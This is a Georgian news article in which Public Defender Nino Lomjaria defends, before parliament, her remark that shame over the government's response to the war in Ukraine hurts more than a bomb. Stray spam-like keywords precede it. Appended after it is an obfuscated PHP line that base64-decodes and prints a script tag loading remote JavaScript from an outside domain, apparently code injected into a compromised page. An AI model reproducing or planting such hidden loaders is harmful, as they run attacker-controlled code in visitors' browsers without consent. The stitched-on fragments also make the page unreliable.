celsiusi
ავერსი საქკაბელი
ნამდვილად არ მერჩივნა, რომ დაგვცემოდა ბომბი, მაგრამ სირცხვილის გრძნობა ხშირ შემთხვევაში არის გაცილებით უფრო მტკივნეული, ამაზე მეთორმეტე საუკუნეში საუბრობდა შოთა რუსთაველი და მე მგონი, ეს პოემა დაწერილია იდეოლოგიაზე, რომ დიახ, სირცხვილი არის ყველაზე მტკივნეული ადამიანისთვის, – ამის შესახებ საქართველოს სახალხო დამცველმა, ნინო ლომჯარიამ პარლამენტის სხდომაზე განაცხადა, სადაც სახალხო დამცველის წლიურ ანგარიშს განიხილავენ.
 
საპარლამენტო უმრავლესობის წევრმა, მარიამ ლაშხმა სახალხო დამცველს მისი განცხადებასთან დაკავშირებით დაუსვა კითხვა – რა იგულისხმებოდა მის განცხადებაში, როდესაც თქვა, რომ სირცხვილისგან მიღებული ტკივილი და წვა შეიძლება იყოს უფრო მძაფრი, ვიდე ბომბისგან მიღებული ტკივილი.
 
როგორც ნინო ლომჯარიამ აღნიშნა, ეს განცხადება მისი მხრიდან გაკეთდა მაშინ, როდესაც უკრაინაში ახალი დაწყებული იყო ომი და ემოციური ფონი საკმაოდ მაღალი იყო.
 
„არ დავიწყებ იმის მტკიცებას, რომ სახალხო დამცველს არ უნდა ომი. თუმცა შეგახსენებთ, როდის გაკეთდა ეს განცხადება ჩემი მხრიდან, რომელიც იყო ჩემი ემოციებისა და ემოციური მდგომარეობის გამოხატულება. ეს იყო ძალიან მალე, როდესაც უკრაინაში დაიწყო ომი. ყველანი ვიყავით აღელვებულები, ყველას ალბათ გაგვახსენდა, ის ტავმა, რაც საქართველოს მოქალაქეებს მიღებული გვაქვს არაერთგზის რუსული აგრესიისა და რუსული თავდასხმის შედეგად. ყველანი ვიყავით სოლიდარულები უკრაინელი მოქალაქეებისა და უკრაინის სახელმწიფოს მიმართ. ეს იყო საერთო საყოველთაო სოლიდარობა. ჩვენ გვინდოდა, გამოგვეხატა და ჩვენს ქვეყანას გამოეხატა მხარდაჭერა უკრაინის მიმართ და ამ პერიოდში გვესმოდა საქართველოს პრემიერ-მინისტრის განცხადებები, რომ ომი არის უკრაინაში და ეს მას არ ეხება, მას თავის საქმე აქვს, რომ უკრაინა დაისჯებოდა და ისჯებოდა რაღაცის გამო, რისთვის ისჯებოდა არ ვიცი. მახსოვს განცხადებები და თავდასხმები ევროკავშირის პარლამენტის წევრებზე. განცხადებები იმაზე, რომ ევროკავშირს უნდოდა ომი და არა რუსეთს, ევროკავშირი და ამერიკა იყო ამაში მთავარი დამნაშავე. მახსოვს განცხადებები, რომ საქართველო არ შეუერთდებოდა იმ სანქციებს, რომელსაც მთელი ცივილიზაცია შეთანხმდა, რომ უნდა დაწესებულიყო და ამ ყველაფერმა გამოიწვია ჩემში სირცხვილის გრძნობა, როგორც ამ ქვეყნის მოქალაქისთვის. დარწმუნებული ვარ, თქვენშიც გამოიწვია სირცხვილის გრძნობა ამ განცხადებებმა, თუმცა თქვენგან განსხვავებით შეიძლება, მე უფრო მეტი შესაძლებლობა მაქვს გამოვხატო ჩემი ემოციური მდგომარეობა“, – განაცხადა ლომჯარიამ.
 
მისივე თქმით, სირცხვილის გრძნობა გამოიწვია იმან, იმ დროს, როდესაც მთელი ქართული საზოგადოება ემოციურად სოლიდარული იყო უკრაინის მიმართ და დიდი ნაწილისთვის უკრაინაში მიმდინარე ომი, უკრაინაში მიმდინარე ბრძოლა თავისუფლებისთვის იყო იდენტიფიცირებული ქართველთა ბრძოლა თავისუფლებისთვის რუსული აგრესიის წინააღმდეგ, პრემიერი აცხადებდა, რომ ეს ბრძოლა არ იყო მისი საქმე.
 
„კიდევ ერთხელ არ დავიწყებ საუბარს, რომ სახალხო დამცველს ომი ქვეყანაში არ უნდა, მაგრამ სულ მცირე, რაც მინდოდა ყოფილიყო ის, რომ საქართველოს ხელისუფლების უმაღლესი თანამდებობის პირებს, ასეთი განცხადებები არ გაეკეთებინათ, ეს იქნებოდა უკეთესი.
 
ნამდვილად არ მერჩივნა, რომ დაგვცემოდა ბომბი, მაგრამ სირცხვილის გრძნობა ხშირ შემთხვევაში არის გაცილებით უფრო მტკივნეული. ეს ჩემი სიტყვები არ არის, ამაზე მეთორმეტე საუკუნეში საუბრობდა შოთა რუსთაველი და მე მგონი, ეს პოემა დაწერილია იდეოლოგიაზე, რომ დიახ, სირცხვილი არის ყველაზე მტკივნეული ადამიანისთვის და მე მგონი, ქართული იდენტობა დგას სწორედ ამ ღირებულებებზე. ამაზე ვსაუბრობდი“,- განაცხადა ნინო ლომჯარიამ.
421
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");